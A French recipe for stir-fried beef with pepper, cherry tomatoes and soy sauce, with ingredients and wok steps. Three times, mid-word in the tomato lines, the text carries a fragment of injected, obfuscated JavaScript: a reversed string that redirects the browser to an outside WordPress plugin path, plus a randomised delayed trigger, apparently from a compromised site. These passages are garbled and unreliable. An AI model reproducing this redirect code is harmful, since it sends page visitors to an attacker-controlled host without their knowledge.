
BOEUF SEL & POIVRE
Pour 4 Pers.
INGRÉDIENTS :
– 4 filets de bœuf
– Un gros poivron rouge
– 1 petite barquette de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates cerises
– 1 oignon jaune
– 2 CS de coriandre ciselée
– 2 CS sauce soja
– Sirop d’agave : 1 CS.
– Gingembre râpé ou en petits cubes surgelés : 1 CS.
– 1 CS d’ail
– Sel et poivre
facultatif : une tige d’oignon nouveau pour décorer
Couper la viande et le poivron en lamelles.
Émincer l’oignon, couper les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates cerises en 2.
Dans un wok, faire chauffer huile et faire dorer rapidement la viande avec l’ail et le gingembre. Réserver.
Cuire rapidement dans le même wok les lamelles de poivron ainsi que les oignons.
Ajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates, la sauce soja, le sirop d’agave, et cuire 5 minutes.
Remettre la viande dans le wok, chauffer rapidement l’ensemble, et ajouter la coriandre.
Décorer avec l’oignon nouveau et servir sans attendre.
NB : On peut servir ce plat avec du riz basmati semi complet.
Pour une version sans féculents, on peut servir ce plat dans une grande feuille de salade.
Bon appétit !
